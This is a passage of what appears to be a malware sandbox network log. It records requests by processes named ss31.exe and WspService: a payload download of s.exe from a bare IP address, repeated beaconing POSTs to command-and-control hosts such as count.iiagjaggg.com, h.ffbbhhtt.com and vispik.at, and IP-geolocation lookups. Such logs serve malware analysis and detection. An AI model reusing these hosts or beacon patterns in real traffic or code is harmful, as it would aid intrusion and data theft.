                                    cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
                                    content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net 'unsafe-eval';style-src fonts.googleapis.com *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ v.whatsapp.net *.fbsbx.com *.fb.com;font-src data: *.gstatic.com *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com *.tenor.co media.tenor.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net *.giphy.com connect.facebook.net *.carriersignal.info blob: android-webview-video-poster: googleads.g.doubleclick.net www.googleadservices.com *.whatsapp.net *.fb.com *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com https://*.giphy.com data:;frame-src *.doubleclick.net *.google.com *.facebook.com www.googleadservices.com *.fbsbx.com fbsbx.com data: www.instagram.com *.fbcdn.net https://paywithmybank.com https://sandbox.paywithmybank.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;
                                    x-fb-rlafr: 0
                                    document-policy: force-load-at-top
                                    cross-origin-opener-policy: same-origin-allow-popups
                                    Pragma: no-cache
                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 0
                                    X-Frame-Options: DENY
                                    origin-agent-cluster: ?0
                                    Strict-Transport-Security: max-age=15552000; preload
                                    Content-Type: text/html; charset="utf-8"
                                    X-FB-Debug: R46pAfw8KLJ/lvzsukKIv+4YD5yFxL6wrQ+tKWKZWBFfCMOpzbPVDt0aO0TRJm1oXAwzN8dv0uLE8ssAJ3s5VA==
                                    Date: Sun, 19 Mar 2023 04:08:11 GMT
                                    Transfer-Encoding: chunked
                                    Alt-Svc: h3=":443"; ma=86400
                                    Connection: keep-alive
                                  • flag-us
                                    GET
                                    https://www.facebook.com/ads/manager/account_settings/account_billing
                                    ss31.exe
                                    Remote address:
                                    157.240.5.35:443
                                    Request
                                    GET /ads/manager/account_settings/account_billing HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                    Host: www.facebook.com
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-prefers-color-scheme: light
                                    Upgrade-Insecure-Requests: 1
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-User: ?1
                                    Sec-Fetch-Dest: document
                                    Response
                                    HTTP/1.1 302 Found
                                    Set-Cookie: sb=s4oWZDVwjQLgxv2h5RDvOyYT; expires=Tue, 18-Mar-2025 04:08:19 GMT; Max-Age=63072000; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                    Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                    x-fb-rlafr: 0
                                    document-policy: force-load-at-top
                                    cross-origin-resource-policy: same-origin
                                    cross-origin-opener-policy: same-origin-allow-popups
                                    Pragma: no-cache
                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 0
                                    X-Frame-Options: DENY
                                    origin-agent-cluster: ?0
                                    Strict-Transport-Security: max-age=15552000; preload
                                    Content-Type: text/html; charset="utf-8"
                                    X-FB-Debug: jlI+0BnKTmSLz3YKJdVpEBYgfF28BIQ6nbdU3hde6O2TP4b97z0WXgQn21NCqEQ9VvPTcu0myh2DgsfA1IpRPQ==
                                    Date: Sun, 19 Mar 2023 04:08:19 GMT
                                    Alt-Svc: h3=":443"; ma=86400
                                    Connection: keep-alive
                                    Content-Length: 0
                                  • flag-us
                                    GET
                                    https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                    ss31.exe
                                    Remote address:
                                    157.240.5.35:443
                                    Request
                                    GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                    Host: www.facebook.com
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-prefers-color-scheme: light
                                    Upgrade-Insecure-Requests: 1
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-User: ?1
                                    Sec-Fetch-Dest: document
                                    Cookie: sb=s4oWZDVwjQLgxv2h5RDvOyYT
                                    Response
                                    HTTP/1.1 200 OK
                                    Vary: Accept-Encoding
                                    Set-Cookie: fr=0XH6RTmOjgi67p9Wp..BkFoqz.PL.AAA.0.0.BkFoqz.AWXUA0TYwwg; expires=Sat, 17-Jun-2023 04:08:18 GMT; Max-Age=7775999; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                    report-to: {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                    cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
                                    content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net 'unsafe-eval';style-src fonts.googleapis.com *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ v.whatsapp.net *.fbsbx.com *.fb.com;font-src data: *.gstatic.com *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com *.tenor.co media.tenor.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net *.giphy.com connect.facebook.net *.carriersignal.info blob: android-webview-video-poster: googleads.g.doubleclick.net www.googleadservices.com *.whatsapp.net *.fb.com *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com https://*.giphy.com data:;frame-src *.doubleclick.net *.google.com *.facebook.com www.googleadservices.com *.fbsbx.com fbsbx.com data: www.instagram.com *.fbcdn.net https://paywithmybank.com https://sandbox.paywithmybank.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;
                                    x-fb-rlafr: 0
                                    document-policy: force-load-at-top
                                    cross-origin-opener-policy: same-origin-allow-popups
                                    Pragma: no-cache
                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 0
                                    X-Frame-Options: DENY
                                    origin-agent-cluster: ?0
                                    Strict-Transport-Security: max-age=15552000; preload
                                    Content-Type: text/html; charset="utf-8"
                                    X-FB-Debug: 176bx2vWp+MiOOYNC+2VGtuRiUKCnGwpu9J/rvVJGI8WiCujDZY13SC+4tWEFqUOA/VwKUnhvzq0tjHDY8F6nQ==
                                    Date: Sun, 19 Mar 2023 04:08:19 GMT
                                    Transfer-Encoding: chunked
                                    Alt-Svc: h3=":443"; ma=86400
                                    Connection: keep-alive
                                  • flag-de
                                    GET
                                    http://77.91.84.172/s.exe
                                    Remote address:
                                    77.91.84.172:80
                                    Request
                                    GET /s.exe HTTP/1.1
                                    Connection: Keep-Alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Host: 77.91.84.172
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:11 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Last-Modified: Sun, 19 Mar 2023 04:06:34 GMT
                                    ETag: "52600-5f738efacc930"
                                    Accept-Ranges: bytes
                                    Content-Length: 337408
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: application/x-msdos-program
                                  • flag-us
                                    DNS
                                    count.iiagjaggg.com
                                    ss31.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    count.iiagjaggg.com
                                    IN A
                                    Response
                                    count.iiagjaggg.com
                                    IN A
                                    45.66.159.179
                                  • flag-us
                                    DNS
                                    35.5.240.157.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    35.5.240.157.in-addr.arpa
                                    IN PTR
                                    Response
                                    35.5.240.157.in-addr.arpa
                                    IN PTR
                                    edge-star-mini-shv-01-mad2facebookcom
                                  • flag-us
                                    DNS
                                    172.84.91.77.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    172.84.91.77.in-addr.arpa
                                    IN PTR
                                    Response
                                    172.84.91.77.in-addr.arpa
                                    IN PTR
                                    wet-lowaezanetwork
                                  • flag-us
                                    GET
                                    http://count.iiagjaggg.com/check/safe
                                    ss31.exe
                                    Remote address:
                                    45.66.159.179:80
                                    Request
                                    GET /check/safe HTTP/1.1
                                    Connection: Keep-Alive
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    Host: count.iiagjaggg.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 19 Mar 2023 04:08:12 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Vary: Accept-Encoding
                                    X-Powered-By: PHP/7.4.30
                                  • flag-us
                                    POST
                                    http://count.iiagjaggg.com/check/?sid=295279&key=1395450b12c9ce7aa49d89a66f4c318f
                                    ss31.exe
                                    Remote address:
                                    45.66.159.179:80
                                    Request
                                    POST /check/?sid=295279&key=1395450b12c9ce7aa49d89a66f4c318f HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    Content-Length: 256
                                    Host: count.iiagjaggg.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 19 Mar 2023 04:08:13 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Vary: Accept-Encoding
                                    X-Powered-By: PHP/7.4.30
                                  • flag-us
                                    GET
                                    http://count.iiagjaggg.com/check/safe
                                    ss31.exe
                                    Remote address:
                                    45.66.159.179:80
                                    Request
                                    GET /check/safe HTTP/1.1
                                    Connection: Keep-Alive
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    Host: count.iiagjaggg.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 19 Mar 2023 04:08:20 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Vary: Accept-Encoding
                                    X-Powered-By: PHP/7.4.30
                                  • flag-us
                                    POST
                                    http://count.iiagjaggg.com/check/?sid=295331&key=3f6bc3d05f1298fdd84c855a884a79db
                                    ss31.exe
                                    Remote address:
                                    45.66.159.179:80
                                    Request
                                    POST /check/?sid=295331&key=3f6bc3d05f1298fdd84c855a884a79db HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    Content-Length: 256
                                    Host: count.iiagjaggg.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 19 Mar 2023 04:08:20 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Vary: Accept-Encoding
                                    X-Powered-By: PHP/7.4.30
                                  • flag-us
                                    GET
                                    http://count.iiagjaggg.com/check/safe
                                    ss31.exe
                                    Remote address:
                                    45.66.159.179:80
                                    Request
                                    GET /check/safe HTTP/1.1
                                    Connection: Keep-Alive
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    Host: count.iiagjaggg.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 19 Mar 2023 04:08:13 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Vary: Accept-Encoding
                                    X-Powered-By: PHP/7.4.30
                                  • flag-us
                                    POST
                                    http://count.iiagjaggg.com/check/?sid=295281&key=245e0e54c838d36f90ed8c7aa82720b5
                                    ss31.exe
                                    Remote address:
                                    45.66.159.179:80
                                    Request
                                    POST /check/?sid=295281&key=245e0e54c838d36f90ed8c7aa82720b5 HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    Content-Length: 256
                                    Host: count.iiagjaggg.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 19 Mar 2023 04:08:13 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Vary: Accept-Encoding
                                    X-Powered-By: PHP/7.4.30
                                  • flag-us
                                    GET
                                    http://count.iiagjaggg.com/check/safe
                                    ss31.exe
                                    Remote address:
                                    45.66.159.179:80
                                    Request
                                    GET /check/safe HTTP/1.1
                                    Connection: Keep-Alive
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    Host: count.iiagjaggg.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 19 Mar 2023 04:08:20 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Vary: Accept-Encoding
                                    X-Powered-By: PHP/7.4.30
                                  • flag-us
                                    POST
                                    http://count.iiagjaggg.com/check/?sid=295333&key=012f022a9abcd0d1fd0e47bff2784b10
                                    ss31.exe
                                    Remote address:
                                    45.66.159.179:80
                                    Request
                                    POST /check/?sid=295333&key=012f022a9abcd0d1fd0e47bff2784b10 HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    Content-Length: 256
                                    Host: count.iiagjaggg.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 19 Mar 2023 04:08:21 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Vary: Accept-Encoding
                                    X-Powered-By: PHP/7.4.30
                                  • flag-us
                                    DNS
                                    179.159.66.45.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    179.159.66.45.in-addr.arpa
                                    IN PTR
                                    Response
                                    179.159.66.45.in-addr.arpa
                                    IN PTR
                                    179 159-66-45rdns scalablednscom
                                  • flag-us
                                    DNS
                                    ip-api.com
                                    WspService
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    ip-api.com
                                    IN A
                                    Response
                                    ip-api.com
                                    IN A
                                    208.95.112.1
                                  • flag-us
                                    GET
                                    http://ip-api.com/json/?fields=8198
                                    WspService
                                    Remote address:
                                    208.95.112.1:80
                                    Request
                                    GET /json/?fields=8198 HTTP/1.1
                                    Accept: */*
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                    Host: ip-api.com
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:24 GMT
                                    Content-Type: application/json; charset=utf-8
                                    Content-Length: 57
                                    Access-Control-Allow-Origin: *
                                    X-Ttl: 60
                                    X-Rl: 44
                                  • flag-us
                                    GET
                                    http://ip-api.com/json/?fields=8198
                                    WspService
                                    Remote address:
                                    208.95.112.1:80
                                    Request
                                    GET /json/?fields=8198 HTTP/1.1
                                    Accept: */*
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                    Host: ip-api.com
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:26 GMT
                                    Content-Type: application/json; charset=utf-8
                                    Content-Length: 57
                                    Access-Control-Allow-Origin: *
                                    X-Ttl: 57
                                    X-Rl: 43
                                  • flag-us
                                    GET
                                    http://ip-api.com/json/?fields=8198
                                    WspService
                                    Remote address:
                                    208.95.112.1:80
                                    Request
                                    GET /json/?fields=8198 HTTP/1.1
                                    Accept: */*
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                    Host: ip-api.com
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:26 GMT
                                    Content-Type: application/json; charset=utf-8
                                    Content-Length: 57
                                    Access-Control-Allow-Origin: *
                                    X-Ttl: 57
                                    X-Rl: 42
                                  • flag-us
                                    DNS
                                    h.ffbbhhtt.com
                                    WspService
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    h.ffbbhhtt.com
                                    IN A
                                    Response
                                    h.ffbbhhtt.com
                                    IN A
                                    104.21.26.69
                                    h.ffbbhhtt.com
                                    IN A
                                    172.67.168.62
                                  • flag-us
                                    POST
                                    https://h.ffbbhhtt.com/api6.php
                                    WspService
                                    Remote address:
                                    104.21.26.69:443
                                    Request
                                    POST /api6.php HTTP/1.1
                                    Accept: */*
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                    Host: h.ffbbhhtt.com
                                    Content-Length: 298
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:26 GMT
                                    Content-Type: application/json; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Vary: Accept-Encoding
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H97No3BYF%2BAP6T4ZDrO437XjpHf5LDp%2BtraIy1BzCSmOPEJ7S%2FHEcN%2FwJxUil5h4xWeUZKdi1S7iYv8v%2FDNbswiAnEmWxlXqKWZw2eTEXv7rPlfnZlXCvlSg2BHUzA8brw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2daad3f05b7af-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    DNS
                                    1.112.95.208.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    1.112.95.208.in-addr.arpa
                                    IN PTR
                                    Response
                                    1.112.95.208.in-addr.arpa
                                    IN PTR
                                    ip-apicom
                                  • flag-us
                                    DNS
                                    69.26.21.104.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    69.26.21.104.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    126.135.241.8.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    126.135.241.8.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    76.38.195.152.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    76.38.195.152.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    POST
                                    https://h.ffbbhhtt.com/api6.php
                                    WspService
                                    Remote address:
                                    104.21.26.69:443
                                    Request
                                    POST /api6.php HTTP/1.1
                                    Accept: */*
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                    Host: h.ffbbhhtt.com
                                    Content-Length: 298
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:27 GMT
                                    Content-Type: application/json; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Vary: Accept-Encoding
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QkQNRrMu9nLlSMT%2Fbg98jOkjZbrGOiHxmvGy5XdK%2FqIZ8uf2oWQdYxjzLj4uTH9uiOKTDGs9zi4FS15%2B7R0ToUwUkvwxKzizs5ea4A2qrSnAffQd8BVANU97NxZYDVrRgA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2dab17a35d0b5-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    https://h.ffbbhhtt.com/api6.php
                                    WspService
                                    Remote address:
                                    104.21.26.69:443
                                    Request
                                    POST /api6.php HTTP/1.1
                                    Accept: */*
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                    Host: h.ffbbhhtt.com
                                    Content-Length: 270
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:28 GMT
                                    Content-Type: application/json; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Vary: Accept-Encoding
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bXKxS%2BPT3tlCh%2FuGOp8%2FkVJed1PB3Pc0FPon70vbFp50N6JbvgMrev5XSIrtmlsmexDKFF6017W3492CyqortpwyBnFtSbbeZdRCGm8X6MyUx%2BGAhUXDZCHzd2Ad92vEjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2dab5e80cb7f2-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    DNS
                                    vispik.at
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    vispik.at
                                    IN A
                                    Response
                                    vispik.at
                                    IN A
                                    176.226.127.181
                                    vispik.at
                                    IN A
                                    222.236.49.124
                                    vispik.at
                                    IN A
                                    190.229.19.7
                                    vispik.at
                                    IN A
                                    211.53.230.67
                                    vispik.at
                                    IN A
                                    123.140.161.243
                                    vispik.at
                                    IN A
                                    187.245.185.123
                                    vispik.at
                                    IN A
                                    187.224.55.97
                                    vispik.at
                                    IN A
                                    195.158.3.162
                                    vispik.at
                                    IN A
                                    86.122.83.142
                                    vispik.at
                                    IN A
                                    187.156.88.173
                                  • flag-hu
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://qnkwv.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 268
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:31 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 8
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
                                  • flag-hu
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://djaxocje.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 238
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:31 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
                                  • flag-tw
                                    GET
                                    http://34.80.59.191/win.pac
                                    Remote address:
                                    34.80.59.191:80
                                    Request
                                    GET /win.pac HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    User-Agent: WinHttp-Autoproxy-Service/5.1
                                    Host: 34.80.59.191
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 19 Mar 2023 04:08:32 GMT
                                    Content-Type: application/octet-stream
                                    Content-Length: 260
                                    Last-Modified: Mon, 26 Sep 2022 09:23:59 GMT
                                    Connection: keep-alive
                                    ETag: "63316faf-104"
                                    Accept-Ranges: bytes
                                  • flag-us
                                    DNS
                                    181.127.226.176.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    181.127.226.176.in-addr.arpa
                                    IN PTR
                                    Response
                                    181.127.226.176.in-addr.arpa
                                    IN PTR
                                    netacc-gpn-6-127-181poolyettelhu
                                  • flag-hu
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
